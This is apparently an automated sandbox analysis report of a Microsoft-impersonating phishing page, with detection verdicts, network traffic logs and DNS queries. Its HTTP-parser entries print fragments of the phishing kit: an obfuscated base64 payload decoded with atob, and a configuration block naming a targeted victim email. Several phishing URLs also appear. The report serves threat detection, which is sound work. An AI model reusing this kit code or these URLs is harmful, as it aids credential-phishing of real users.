Source: https://cscu7d92p8txbouicg5l0mzaqlzex8hyiu8es41kvvwopetk1z.bytestrxeam.ru/oheyiiqtwfkhhtxzmjuphdf5krzlrakr3ryv7qavx6b9hjiou?QUQYEVCPVLTRUABIE | Joe Sandbox AI: Score: 9 Reasons: The URL 'cscu7d92p8txbouicg5l0mzaqlzex8hyiu8es41kvvwopetk1z.bytestrxeam.ru' does not match the legitimate domain 'microsoft.com'., The domain 'bytestrxeam.ru' is not associated with Microsoft and appears suspicious., The URL contains a random string and an unusual domain extension '.ru', which is not typical for Microsoft., The input field email 'purchasing@texanacenter.com' does not align with Microsoft, indicating potential phishing., The brand 'Microsoft' is well-known, and any legitimate site would use a recognizable Microsoft domain. DOM: 3.7.pages.csv |
Source: Yara match | File source: 3.6.pages.csv, type: HTML |
Source: Yara match | File source: 3.8.pages.csv, type: HTML |
Source: Yara match | File source: 3.7.pages.csv, type: HTML |
Source: Yara match | File source: 3.9.pages.csv, type: HTML |
Source: Yara match | File source: 2.18.d.script.csv, type: HTML |
Source: Yara match | File source: 2.4.pages.csv, type: HTML |
Source: Yara match | File source: 2.3.pages.csv, type: HTML |
Source: Yara match | File source: 3.36..script.csv, type: HTML |
Source: Yara match | File source: 3.33.d.script.csv, type: HTML |
Source: Yara match | File source: 2.19.d.script.csv, type: HTML |
Source: Yara match | File source: 2.23..script.csv, type: HTML |
Source: Yara match | File source: 2.4.pages.csv, type: HTML |
Source: Yara match | File source: 2.3.pages.csv, type: HTML |
Source: Yara match | File source: 2.26.d.script.csv, type: HTML |
Source: Yara match | File source: 3.28..script.csv, type: HTML |
Source: Yara match | File source: 3.29..script.csv, type: HTML |
Source: Yara match | File source: 3.6.pages.csv, type: HTML |
Source: Yara match | File source: 3.8.pages.csv, type: HTML |
Source: Yara match | File source: 3.7.pages.csv, type: HTML |
Source: Yara match | File source: 3.9.pages.csv, type: HTML |
Source: 1.16..script.csv | Joe Sandbox AI: Detected suspicious JavaScript with source url: https://sturbridge.de/... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The script uses various encoding and decoding techniques to conceal the final destination URL, which could be used for malicious purposes such as phishing or redirecting users to malicious sites. Additionally, the script checks the validity of the decoded URL, which suggests an attempt to bypass security measures. Overall, the combination of these behaviors indicates a high-risk script that should be further investigated. |
Source: 2.17..script.csv | Joe Sandbox AI: Detected suspicious JavaScript with source url: https://cscu7d92p8txbouicg5l0mzaqlzex8hyiu8es41kvv... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of `atob()` and `decodeURIComponent()` to decode and execute remote code is a clear indicator of malicious intent. Additionally, the script appears to be sending user data to an untrusted domain, which poses a significant risk of data theft or other malicious activities. Overall, this script exhibits a high level of suspicion and should be treated as a potential security threat. |
Source: 1.11..script.csv | Joe Sandbox AI: Detected suspicious JavaScript with source url: https://sturbridge.de/... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. It attempts to execute remote code, sends user data to external servers, and uses heavily encoded strings. Additionally, the script checks for the presence of various browser automation tools, which suggests potential malicious intent. Overall, this script poses a significant security risk and should be treated with caution. |
Source: https://cscu7d92p8txbouicg5l0mzaqlzex8hyiu8es41kvvwopetk1z.bytestrxeam.ru/oheyiiqtwfkhhtxzmjuphdf5krzlrakr3ryv7qavx6b9hjiou?QUQYEVCPVLTRUABIE | HTTP Parser: Invalid link: Terms of use |
Source: https://cscu7d92p8txbouicg5l0mzaqlzex8hyiu8es41kvvwopetk1z.bytestrxeam.ru/oheyiiqtwfkhhtxzmjuphdf5krzlrakr3ryv7qavx6b9hjiou?QUQYEVCPVLTRUABIE | HTTP Parser: Invalid link: Privacy & cookies |
Source: https://cscu7d92p8txbouicg5l0mzaqlzex8hyiu8es41kvvwopetk1z.bytestrxeam.ru/oheyiiqtwfkhhtxzmjuphdf5krzlrakr3ryv7qavx6b9hjiou?QUQYEVCPVLTRUABIE | HTTP Parser: Invalid link: Terms of use |
Source: https://cscu7d92p8txbouicg5l0mzaqlzex8hyiu8es41kvvwopetk1z.bytestrxeam.ru/oheyiiqtwfkhhtxzmjuphdf5krzlrakr3ryv7qavx6b9hjiou?QUQYEVCPVLTRUABIE | HTTP Parser: Invalid link: Privacy & cookies |
Source: https://cscu7d92p8txbouicg5l0mzaqlzex8hyiu8es41kvvwopetk1z.bytestrxeam.ru/oheyiiqtwfkhhtxzmjuphdf5krzlrakr3ryv7qavx6b9hjiou?QUQYEVCPVLTRUABIE | HTTP Parser: Invalid link: Terms of use |
Source: https://cscu7d92p8txbouicg5l0mzaqlzex8hyiu8es41kvvwopetk1z.bytestrxeam.ru/oheyiiqtwfkhhtxzmjuphdf5krzlrakr3ryv7qavx6b9hjiou?QUQYEVCPVLTRUABIE | HTTP Parser: Invalid link: Privacy & cookies |
Source: https://cscu7d92p8txbouicg5l0mzaqlzex8hyiu8es41kvvwopetk1z.bytestrxeam.ru/oheyiiqtwfkhhtxzmjuphdf5krzlrakr3ryv7qavx6b9hjiou?QUQYEVCPVLTRUABIE | HTTP Parser: Invalid link: Terms of use |
Source: https://cscu7d92p8txbouicg5l0mzaqlzex8hyiu8es41kvvwopetk1z.bytestrxeam.ru/oheyiiqtwfkhhtxzmjuphdf5krzlrakr3ryv7qavx6b9hjiou?QUQYEVCPVLTRUABIE | HTTP Parser: Invalid link: Privacy & cookies |
Source: https://cscu7d92p8txbouicg5l0mzaqlzex8hyiu8es41kvvwopetk1z.bytestrxeam.ru/F2csRk/$purchasing@texanacenter.com | HTTP Parser: function bhwsacmmci(){vpeirjdkmx = atob("pcfet0nuwvbfigh0bww+cjxodg1sigxhbmc9imvuij4kpghlywq+ciagica8bwv0ysbjagfyc2v0psjvveytoci+ciagica8bwv0ysbuyw1lpsj2awv3cg9ydcigy29udgvudd0id2lkdgg9zgv2awnllxdpzhrolcbpbml0awfslxnjywxlpteumci+ciagica8dgl0bgu+qukgvukgvgvtcgxhdgu8l3rpdgxlpgogicagphn0ewxlpgogicagicagigjvzhkgewogicagicagicagicbmb250lwzhbwlsetogj1nlz29lifvjjywgvgfob21hlcbhzw5ldmesifzlcmrhbmesihnhbnmtc2vyawy7ciagicagicagicagigjhy2tncm91bmqty29sb3i6icmxytfhmwe7ciagicagicagicagignvbg9yoiajztblmguwowogicagicagicagicbtyxjnaw46ida7ciagicagicagicagihbhzgrpbmc6ida7ciagicagicagicagigxpbmutagvpz2h0oiaxljy7ciagicagicagfqogicagicagighlywrlcib7ciagicagicagicagigjhy2tncm91bmqty29sb3i6icmwzdq3yte7ciagicagicagicagihbhzgrpbmc6idiwchg7ciagicagicagicagihrlehqtywxpz246ignlbnrlcjskicagicagicagicagym9yzgvylwjvdhrvbtogmnb4ihnvbglkicm2ngi1zjy7ciagicagicagfqogicagicagighlywrlcibomsb7ciagicagicagicagig1hcmdpbjogmdskicagicagicagicagzm9udc1zaxploiazmnb4owogicagicagicagicbjb2xvcjogi2zmzmzmzjskicagicagicb9ciagicagicagbmf2ihskicagicagicagi... |
Source: anonymous function | HTTP Parser: var otherweburl = "";var websitenames = ["godaddy", "okta"];var bes = ["apple.com","netflix.com"];var pes = ["https:\/\/t.me\/","https:\/\/t.com\/","t.me\/","https:\/\/t.me.com\/","t.me.com\/","t.me@","https:\/\/t.me@","https:\/\/t.me","https:\/\/t.com","t.me","https:\/\/t.me.com","t.me.com","t.me\/@","https:\/\/t.me\/@","https:\/\/t.me@\/","t.me@\/","https:\/\/www.telegram.me\/","https:\/\/www.telegram.me"];var capnum = 1;var appnum = 1;var pvn = 0;var view = "";var pagelinkval = "x6avo";var emailcheck = "purchasing@texanacenter.com";var webname = "rtrim(/web9/, '/')";var urlo = "/rfxu4hsy2hshikakzizetrt0yucpgsulpssthx9vdnjqi6q4a3vy55nkrz4";var gdf = "/ghmovgx4qqpifmlrgesxwxcjuu7jbagqooab115";var odf = "/ghzd8ya8wtwcltmzr8dytwif8v8tg7uvcvc0yqwsocd650";var twa = 0;var currentreq = null;var requestsent = false;var pagedata = "";var redirecturl = "";var useragent = navigator.useragent;var browsername;var userip;var usercountry;var errorcodeexecuted = false;if(us... |
Source: https://vwj9ymusjv9xeh65cf602u2rmsnkbyf2u7lxtnawlaim1gvceu.moydow.de/5417971987/6327230191/#bnBkL3NmdW9mZGJvYnlmdUFob2p0Ymlkc3ZxJTBsU3RkM0cwdnMvbmJmeXN1VGZ1ekMvezJsdWZxUFhXV0wyNVRmOXZqWkk5eUZbbXJie04xTTZIREp2cGN5dTlRMzplOFZkVEQwMDt0cXV1aQ== | HTTP Parser: No favicon |
Source: https://sturbridge.de/#bnBkL3NmdW9mZGJvYnlmdUFob2p0Ymlkc3ZxJTBsU3RkM0cwdnMvbmJmeXN1VGZ1ekMvezJsdWZxUFhXV0wyNVRmOXZqWkk5eUZbbXJie04xTTZIREp2cGN5dTlRMzplOFZkVEQwMDt0cXV1aQ== | HTTP Parser: No favicon |
Source: https://cscu7d92p8txbouicg5l0mzaqlzex8hyiu8es41kvvwopetk1z.bytestrxeam.ru/oheyiiqtwfkhhtxzmjuphdf5krzlrakr3ryv7qavx6b9hjiou?QUQYEVCPVLTRUABIE | HTTP Parser: No favicon |
Source: https://cscu7d92p8txbouicg5l0mzaqlzex8hyiu8es41kvvwopetk1z.bytestrxeam.ru/oheyiiqtwfkhhtxzmjuphdf5krzlrakr3ryv7qavx6b9hjiou?QUQYEVCPVLTRUABIE | HTTP Parser: No favicon |
Source: https://cscu7d92p8txbouicg5l0mzaqlzex8hyiu8es41kvvwopetk1z.bytestrxeam.ru/oheyiiqtwfkhhtxzmjuphdf5krzlrakr3ryv7qavx6b9hjiou?QUQYEVCPVLTRUABIE | HTTP Parser: No favicon |
Source: https://cscu7d92p8txbouicg5l0mzaqlzex8hyiu8es41kvvwopetk1z.bytestrxeam.ru/oheyiiqtwfkhhtxzmjuphdf5krzlrakr3ryv7qavx6b9hjiou?QUQYEVCPVLTRUABIE | HTTP Parser: No favicon |
Source: https://cscu7d92p8txbouicg5l0mzaqlzex8hyiu8es41kvvwopetk1z.bytestrxeam.ru/oheyiiqtwfkhhtxzmjuphdf5krzlrakr3ryv7qavx6b9hjiou?QUQYEVCPVLTRUABIE | HTTP Parser: No <meta name="author".. found |
Source: https://cscu7d92p8txbouicg5l0mzaqlzex8hyiu8es41kvvwopetk1z.bytestrxeam.ru/oheyiiqtwfkhhtxzmjuphdf5krzlrakr3ryv7qavx6b9hjiou?QUQYEVCPVLTRUABIE | HTTP Parser: No <meta name="author".. found |
Source: https://cscu7d92p8txbouicg5l0mzaqlzex8hyiu8es41kvvwopetk1z.bytestrxeam.ru/oheyiiqtwfkhhtxzmjuphdf5krzlrakr3ryv7qavx6b9hjiou?QUQYEVCPVLTRUABIE | HTTP Parser: No <meta name="author".. found |
Source: https://cscu7d92p8txbouicg5l0mzaqlzex8hyiu8es41kvvwopetk1z.bytestrxeam.ru/oheyiiqtwfkhhtxzmjuphdf5krzlrakr3ryv7qavx6b9hjiou?QUQYEVCPVLTRUABIE | HTTP Parser: No <meta name="author".. found |
Source: https://vwj9ymusjv9xeh65cf602u2rmsnkbyf2u7lxtnawlaim1gvceu.moydow.de/5417971987/6327230191/#bnBkL3NmdW9mZGJvYnlmdUFob2p0Ymlkc3ZxJTBsU3RkM0cwdnMvbmJmeXN1VGZ1ekMvezJsdWZxUFhXV0wyNVRmOXZqWkk5eUZbbXJie04xTTZIREp2cGN5dTlRMzplOFZkVEQwMDt0cXV1aQ== | HTTP Parser: No <meta name="copyright".. found |
Source: https://cscu7d92p8txbouicg5l0mzaqlzex8hyiu8es41kvvwopetk1z.bytestrxeam.ru/oheyiiqtwfkhhtxzmjuphdf5krzlrakr3ryv7qavx6b9hjiou?QUQYEVCPVLTRUABIE | HTTP Parser: No <meta name="copyright".. found |
Source: https://cscu7d92p8txbouicg5l0mzaqlzex8hyiu8es41kvvwopetk1z.bytestrxeam.ru/oheyiiqtwfkhhtxzmjuphdf5krzlrakr3ryv7qavx6b9hjiou?QUQYEVCPVLTRUABIE | HTTP Parser: No <meta name="copyright".. found |
Source: https://cscu7d92p8txbouicg5l0mzaqlzex8hyiu8es41kvvwopetk1z.bytestrxeam.ru/oheyiiqtwfkhhtxzmjuphdf5krzlrakr3ryv7qavx6b9hjiou?QUQYEVCPVLTRUABIE | HTTP Parser: No <meta name="copyright".. found |
Source: https://cscu7d92p8txbouicg5l0mzaqlzex8hyiu8es41kvvwopetk1z.bytestrxeam.ru/oheyiiqtwfkhhtxzmjuphdf5krzlrakr3ryv7qavx6b9hjiou?QUQYEVCPVLTRUABIE | HTTP Parser: No <meta name="copyright".. found |
Source: global traffic | TCP traffic: 192.168.2.16:61937 -> 1.1.1.1:53 |
Source: global traffic | TCP traffic: 192.168.2.16:61937 -> 1.1.1.1:53 |
Source: global traffic | TCP traffic: 192.168.2.16:61955 -> 1.1.1.1:53 |
Source: global traffic | TCP traffic: 192.168.2.16:61937 -> 1.1.1.1:53 |
Source: global traffic | TCP traffic: 192.168.2.16:61955 -> 1.1.1.1:53 |
Source: global traffic | TCP traffic: 192.168.2.16:61937 -> 1.1.1.1:53 |
Source: global traffic | TCP traffic: 192.168.2.16:61955 -> 1.1.1.1:53 |
Source: global traffic | TCP traffic: 192.168.2.16:61937 -> 1.1.1.1:53 |
Source: global traffic | TCP traffic: 192.168.2.16:61955 -> 1.1.1.1:53 |
Source: global traffic | TCP traffic: 192.168.2.16:61937 -> 1.1.1.1:53 |
Source: global traffic | TCP traffic: 192.168.2.16:61955 -> 1.1.1.1:53 |
Source: global traffic | TCP traffic: 192.168.2.16:61937 -> 1.1.1.1:53 |
Source: global traffic | TCP traffic: 192.168.2.16:61955 -> 1.1.1.1:53 |
Source: global traffic | TCP traffic: 192.168.2.16:61937 -> 1.1.1.1:53 |
Source: global traffic | TCP traffic: 192.168.2.16:61955 -> 1.1.1.1:53 |
Source: global traffic | TCP traffic: 192.168.2.16:61937 -> 1.1.1.1:53 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203 |
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203 |
Source: unknown | TCP traffic detected without corresponding DNS query: 2.23.227.208 |
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203 |
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203 |
Source: unknown | TCP traffic detected without corresponding DNS query: 142.250.186.67 |
Source: unknown | TCP traffic detected without corresponding DNS query: 142.250.186.67 |
Source: unknown | TCP traffic detected without corresponding DNS query: 142.250.186.67 |
Source: unknown | TCP traffic detected without corresponding DNS query: 142.250.186.67 |
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203 |
Source: unknown | TCP traffic detected without corresponding DNS query: 142.250.186.67 |
Source: unknown | TCP traffic detected without corresponding DNS query: 52.182.143.211 |
Source: unknown | TCP traffic detected without corresponding DNS query: 52.182.143.211 |
Source: unknown | TCP traffic detected without corresponding DNS query: 52.182.143.211 |
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203 |
Source: unknown | TCP traffic detected without corresponding DNS query: 23.60.203.209 |
Source: unknown | TCP traffic detected without corresponding DNS query: 23.60.203.209 |
Source: unknown | TCP traffic detected without corresponding DNS query: 23.60.203.209 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | TCP traffic detected without corresponding DNS query: 52.182.143.211 |
Source: unknown | TCP traffic detected without corresponding DNS query: 52.182.143.211 |
Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: global traffic | HTTP traffic detected: GET /jquery-3.3.1.slim.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveOrigin: https://vwj9ymusjv9xeh65cf602u2rmsnkbyf2u7lxtnawlaim1gvceu.moydow.desec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://vwj9ymusjv9xeh65cf602u2rmsnkbyf2u7lxtnawlaim1gvceu.moydow.de/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9 |
Source: global traffic | HTTP traffic detected: GET /jquery-1.9.1.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://vwj9ymusjv9xeh65cf602u2rmsnkbyf2u7lxtnawlaim1gvceu.moydow.de/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9 |
Source: global traffic | HTTP traffic detected: GET /ajax/libs/popper.js/1.14.0/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveOrigin: https://vwj9ymusjv9xeh65cf602u2rmsnkbyf2u7lxtnawlaim1gvceu.moydow.desec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://vwj9ymusjv9xeh65cf602u2rmsnkbyf2u7lxtnawlaim1gvceu.moydow.de/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9 |
Source: global traffic | HTTP traffic detected: GET /logout.srf?ct=1548343592&rver=64.4.6456.0&lc=1033&id=501392 HTTP/1.1Host: login.microsoftonline.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://vwj9ymusjv9xeh65cf602u2rmsnkbyf2u7lxtnawlaim1gvceu.moydow.de/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9 |
Source: global traffic | HTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://cscu7d92p8txbouicg5l0mzaqlzex8hyiu8es41kvvwopetk1z.bytestrxeam.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9 |
Source: global traffic | HTTP traffic detected: GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://cscu7d92p8txbouicg5l0mzaqlzex8hyiu8es41kvvwopetk1z.bytestrxeam.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9 |
Source: global traffic | HTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://cscu7d92p8txbouicg5l0mzaqlzex8hyiu8es41kvvwopetk1z.bytestrxeam.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9 |
Source: global traffic | HTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog |
Source: global traffic | HTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog |
Source: global traffic | HTTP traffic detected: GET /turnstile/v0/g/f3b948d8acb8/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://cscu7d92p8txbouicg5l0mzaqlzex8hyiu8es41kvvwopetk1z.bytestrxeam.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9 |
Source: global traffic | HTTP traffic detected: GET /favicon.png HTTP/1.1Host: developers.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://cscu7d92p8txbouicg5l0mzaqlzex8hyiu8es41kvvwopetk1z.bytestrxeam.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9 |
Source: global traffic | HTTP traffic detected: GET /favicon.png HTTP/1.1Host: developers.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=XR32j.c56DCluf_zlU_9DOQ_LpNAAIcas4XM.Le6HHs-1741899851-1.0.1.1-8JF0eEOJeqDNCReScokyotFwPDfA7mXe3UqFDzPWdqYbnU6xCAXCwvePVBiFnhkGXnq.jDHDwjN7qmF9KAPNXIlesgcTVpvnoSMBqzrnm9Y |
Source: global traffic | HTTP traffic detected: GET /fent/randexp.js/releases/download/v0.4.3/randexp.min.js HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://cscu7d92p8txbouicg5l0mzaqlzex8hyiu8es41kvvwopetk1z.bytestrxeam.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9 |
Source: global traffic | HTTP traffic detected: GET /github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250313%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250313T210434Z&X-Amz-Expires=300&X-Amz-Signature=a63cd4a7978e3f9ed79c5b95c645945118ee807ea55d03ae9f0eb77bd6dfe32b&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://cscu7d92p8txbouicg5l0mzaqlzex8hyiu8es41kvvwopetk1z.bytestrxeam.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9 |
Source: global traffic | DNS traffic detected: DNS query: vwj9ymusjv9xeh65cf602u2rmsnkbyf2u7lxtnawlaim1gvceu.moydow.de |
Source: global traffic | DNS traffic detected: DNS query: www.google.com |
Source: global traffic | DNS traffic detected: DNS query: code.jquery.com |
Source: global traffic | DNS traffic detected: DNS query: cdnjs.cloudflare.com |
Source: global traffic | DNS traffic detected: DNS query: stackpath.bootstrapcdn.com |
Source: global traffic | DNS traffic detected: DNS query: login.microsoftonline.com |
Source: global traffic | DNS traffic detected: DNS query: aadcdn.msftauth.net |
Source: global traffic | DNS traffic detected: DNS query: sturbridge.de |
Source: global traffic | DNS traffic detected: DNS query: a.nel.cloudflare.com |
